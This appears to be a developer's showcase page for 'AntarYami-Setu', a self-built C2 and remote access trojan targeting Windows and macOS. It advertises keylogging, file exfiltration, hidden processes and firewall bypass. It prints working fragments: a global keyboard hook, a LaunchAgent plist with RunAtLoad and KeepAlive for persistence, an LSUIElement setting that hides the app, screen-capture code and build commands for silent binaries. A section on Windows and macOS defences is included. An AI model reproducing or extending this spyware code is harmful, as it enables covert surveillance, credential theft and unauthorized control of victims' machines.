A dual-mode, cross-platform remote telemetry and infrastructure management suite. Designed to provide seamless remote administration, real-time metrics, and operational command lines over direct TCP sockets and firewall-friendly HTTP APIs.
Understanding the foundation of the platform: What is it, and why does it exist?
AntarYami-Setu (meaning "The Inner Bridge") is a multi-tier Command and Control (C2) and Remote Administration Tool (RAT) ecosystem. The platform enables secure, stealthy, and persistent remote system management and auditing of endpoint machines.
Unlike generic tools, it supports **dual connection pathways** to adapt to any network environment. It bridges the gap between administrators and targets by managing raw telemetry, background shell executions, and global inputs from a central WinForms hub or a web-relay PHP backend.
I engineered the AntarYami Ecosystem to push the limits of low-level Windows APIs, network socket performance, and payload design. Building a C2/RAT from scratch teaches concepts that no textbook can:
1. Direct Network Architectures: Programming custom raw TCP socket channels vs HTTP pulling APIs to test persistence over strict corporate proxies.
2. OS Internals & Security Auditing: Manipulating low-level Win32 Hooks (such as keyboard surveillance), registry injections for startup survival, and background daemon lifecycles on macOS.
3. Firewall Bypass Mechanisms: Demonstrating how HTTP POST polling can blend into regular SSL web traffic, proving standard firewalls can easily bypass inbound blocks if the client makes outbound calls.
Cross-platform capability breakdown comparison between local sockets and wide-area web channels.
| Capability / Feature | 📡 WinOffline Agent (TCP LAN) | 🌐 WinOnline Agent (HTTP WAN) | 🍎 MacOnline Agent (HTTP WAN) |
|---|---|---|---|
| Connection Topology | Direct TCP (9999) | HTTP Polling API | HTTP Polling API |
| Latency & Heartbeat | Real-time (<10ms) | 3s - 5s Polling | 5s fetch, 10s telemetry |
| Remote Screen Capture | Live Stream (JPEG GDI+) | Static Screenshot | Static PNG (screencapture) |
| Interactive File Manager | Visual Tree/List UI | Command Line | Command Line (`cd`/`cat`) |
| Clipboard Read/Write | Full STA Sync | Not Supported | Not Supported |
| Keystroke Hook (Keylogger) | Real-time Hook | Buffered Periodic upload | Disabled (Requires TCC) |
| File Exfiltration (Pull) | Direct Sockets | Server uploads/ Vault | Server uploads/ Vault |
| File Injection (Push) | Direct Sockets | Web Download | Web Download |
| Command Execution | Interactive Cmd/PS | Job queue Cmd/PS | Job queue Zsh |
| Custom Audio Alerts / TTS | TTS synthesis / Beeps | Beep commands | AppleScript Beeps / `say` |
| Startup Persistence | Registry Run Keys | Registry Run Keys | LaunchAgents daemon plist |
| Background Stealth | Windowless process | Windowless process | plist LSUIElement |
Visual workflow and component division of the ANTARYAMI-SETU ecosystem.
Built in C# using .NET 10.0 Windows Forms. Serves as COMMAND center hosting direct TCP socket listeners (Port 9999) and polls the C2 Web Gateway database for remote nodes.
Designed for low-latency direct-TCP LAN networks. Hooks Windows APIs silently, providing live video feeds and direct registry modifications with minimal footprint.
Relays commands and binary uploads asynchronously via `api_setu.php` to a MySQL database, enabling communication across NAT and local packet filters.
Executes outbound HTTP/S polling towards the C2 Gateway. Circumvents inbound port blocks by utilizing standard SSL ports (80/443).
Cross-compiled Universal app bundle for Apple Silicon and Intel. Integrates LaunchAgents daemon hooks and zsh command redirects for silent background execution.
Deep dive into the operational mechanics, persistence, and design details of each agent module.
The **WinOffline Agent** is built specifically for local network topologies or direct IP access scenarios. Operating on a raw binary communication paradigm via **TCP Sockets on Port 9999**, it sidesteps high-bandwidth serializers like JSON or XML, ensuring sub-millisecond execution loops.
This module is heavily reliant on native Win32 DLL assemblies. Through kernel mappings (P/Invoke), it controls process frames, streams screen layouts asynchronously, hooks keyboards globally, and updates clipboards through apartment state wrapper threads.
The **WinOnline Agent** is engineered to survive environments where inbound connections are blocked (behind router firewalls or NAT proxies). Rather than listening for socket connections, it triggers outbound RESTful HTTP requests directed to `api_setu.php`.
All command queues and files are stored and managed inside a central MySQL database. The agent checks for pending commands periodically (every 5 seconds) and replies with execution output using multipart form transfers.
The **macOS Online Agent** is a specialized C# C2 background runner built using the .NET 10 macOS runtime environment. Its primary objective is stealthy status tracking and command dispatching on macOS targets.
It runs silently in the background by setting the `LSUIElement` parameter to true inside its application package, completely removing Dock icons and menu presence. It integrates with macOS native components by routing commands to `/bin/zsh` and persisting via plist configurations.
System components, development languages, frameworks, and low-level API libraries.
Examine the code structures, equations, and algorithms that run inside the C2 command channels.
// Structure: [1-Byte Type] [4-Bytes Payload Length (BigEndian)] [N-Bytes Payload]
byte packetType = 0x08; // Live stream frame identifier
byte[] payloadBytes = GetStreamFrameBytes();
byte[] headerBytes = new byte[5];
headerBytes[0] = packetType;
// Copy the payload length into the 4 bytes header block
byte[] lenBytes = BitConverter.GetBytes(payloadBytes.Length);
Array.Copy(lenBytes, 0, headerBytes, 1, 4);
// Write combined buffer to network stream
networkStream.Write(headerBytes, 0, headerBytes.Length);
networkStream.Write(payloadBytes, 0, payloadBytes.Length);
networkStream.Flush();
// Concatenate machine details to build a target signature
string rawHardwareString = Environment.MachineName + Environment.UserName;
using (SHA256 sha256 = SHA256.Create())
{
byte[] rawHashBytes = sha256.ComputeHash(Encoding.UTF8.GetBytes(rawHardwareString));
string hexString = BitConverter.ToString(rawHashBytes).Replace("-", "").ToLower();
// Generate unique ID: first 12 bytes of hash + connection suffix
_deviceId = hexString.Substring(0, 12) + "_SETU_MAC"; // (_SETU_WEB for WinOnline, _SETU for WinOffline)
}
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleIdentifier</key>
<string>com.antaryami.maconlineagent</string>
<key>CFBundleName</key>
<string>MacOnlineAgent</string>
<!-- Suppress dock and windows presence -->
<key>LSUIElement</key>
<true/>
</dict>
</plist>
// Path: ~/Library/LaunchAgents/com.antaryami.maconlineagent.plist
string plistContent = @"<?xml version=""1.0"" encoding=""UTF-8""?>
<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/DTDs/PropertyList-1.0.dtd"">
<plist version=""1.0"">
<dict>
<key>Label</key>
<string>com.antaryami.maconlineagent</string>
<key>ProgramArguments</key>
<array>
<string>" + appBinaryPath + @"</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
</dict>
</plist>";
private IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && (wParam == (IntPtr)WM_KEYDOWN || wParam == (IntPtr)WM_SYSKEYDOWN))
{
int virtualKeyCode = Marshal.ReadInt32(lParam);
string decodedKeyString = TranslateVirtualKey(virtualKeyCode);
// Append window title indicators on context switch
AppendActiveWindowTitleIfChanged();
lock (_keyLock)
{
_keyBuffer.Append(decodedKeyString);
}
}
return CallNextHookEx(_hookId, nCode, wParam, lParam);
}
private byte[] CompressScreenFrame(Bitmap screenFrame, long qualityFactor)
{
ImageCodecInfo jpegEncoder = GetEncoder(ImageFormat.Jpeg);
using (EncoderParameters encoderParams = new EncoderParameters(1))
{
using (EncoderParameter parameter = new EncoderParameter(Encoder.Quality, qualityFactor))
{
encoderParams.Param[0] = parameter;
using (MemoryStream stream = new MemoryStream())
{
screenFrame.Save(stream, jpegEncoder, encoderParams);
return stream.ToArray();
}
}
}
}
A vulnerability and defense analysis comparing modern Windows 11 vs macOS Sequoia systems.
Heuristic scanners actively monitor suspicious process chains like hidden CMD/PowerShell threads spawned from unsigned executables running under CommonApplicationData (`ProgramData`). PowerShell code run via the command bridge triggers AMSI buffers before execution.
Modifications to user startup paths (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`) by unsigned files triggers automatic alert patterns, requiring code signatures or privilege elevations.
Agents running within low-integrity user execution contexts are blocked from accessing critical administrative folders, editing hardware registers, or hooking high-priority processes.
macOS sandboxes unsigned bundles by running them from random read-only virtual paths (app translocation) to prevent dynamic link hijacking and system integrity overrides.
Access to core APIs (like `screencapture`) requires explicit approval in "System Settings -> Privacy & Security -> Screen Recording". Accessibility hooks require root authorization or profile configuration.
Whenever a new plist file registers in `LaunchAgents` directories, macOS triggers a system notification popup warning the user that a new background task has registered to run at load.
Insights from the developer behind the engineering of the AntarYami Ecosystem.
I have always believed that software shouldn't just be an execution script; it should be a reflection of a developer’s soul. Today, I am incredibly proud to announce the launch of my most ambitious project yet: AntarYami Setu.
Building AntarYami Setu from the ground up was never just a coding task. It has been a long, demanding journey defined by sleepless nights, thousands of refactored lines of code, and a years-long obsession with the silent, complex world of Windows internals. As a field-oriented system, AntarYami Setu stands as a testament to every compile-time failure I've overcome and everything I have learned about stealth persistence, secure remote sockets, and low-level system control.
What makes AntarYami Setu my heart and soul? It is built on three key engineering pillars that define its core strength:
Package the C# source directories into dependency-free, silent background executables.
# Compile to a standalone single-file Windows binary that runs hidden
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true -p:AssemblyName=AntaryamiWinAgent
# Package as a universal application bundle using automated scripts
chmod +x build_app.sh
./build_app.sh